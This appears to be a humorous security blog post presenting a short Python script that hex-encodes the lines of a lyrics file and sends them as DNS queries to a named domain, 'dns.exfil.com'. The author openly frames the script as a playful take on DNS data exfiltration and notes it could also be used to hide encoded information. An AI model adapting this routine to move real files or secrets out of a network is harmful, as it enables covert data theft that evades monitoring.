Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

DNS Rickroll – Trolling Sysadmins to Ring in the New Year!

I wanted to release something lighter around the holidays, so I present my DNS Rickroll python script!

As you know, DNS is for data exfiltration, tunneling, and general malfeasance. In the spirit of the holidays, I’ve decided to release a slightly different tool utilizing DNS.

DNS Rickroll takes a lyrics file (currently this), converts it to ASCII hex, and sends a DNS request to the specified domain.

Code

To start, all the script needs is Python, dnspython, and a lyrics.txt file (included). Additionally, you can add a domain where you can verify results and a healthy sense of humor.

You can find the current code for DNSRickroll below.

import dns.resolver
import urllib

myResolver = dns.resolver.Resolver()
domain = "dns.exfil.com"

with open('lyrics.txt') as f:
    content = f.readlines()
    content = [x.strip() for x in content] 

for line in content:
    hex = ''.join("{:02x}".format(ord(c)) for c in line)
    #print hex
    #print len(hex)

    query = myResolver.query(hex + "." + domain, "A")

Execution

And here you can see the requests in action!

DNS Rickroll - Execution

While this tool is definitely for fun, I could also see it being used to double encode information in lyrics, etc. Alternatively, the script could arrange the order of lyrics as another form of obfuscation and encoding.

Conclusion

Some of my next steps will be to add more lyrics and automatically shorten the lines (I manually edited this lyrics file). Additionally, I may add support for a URL where it can verify its own results.

Finally, you can find the code and updates in my GitHub repository.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.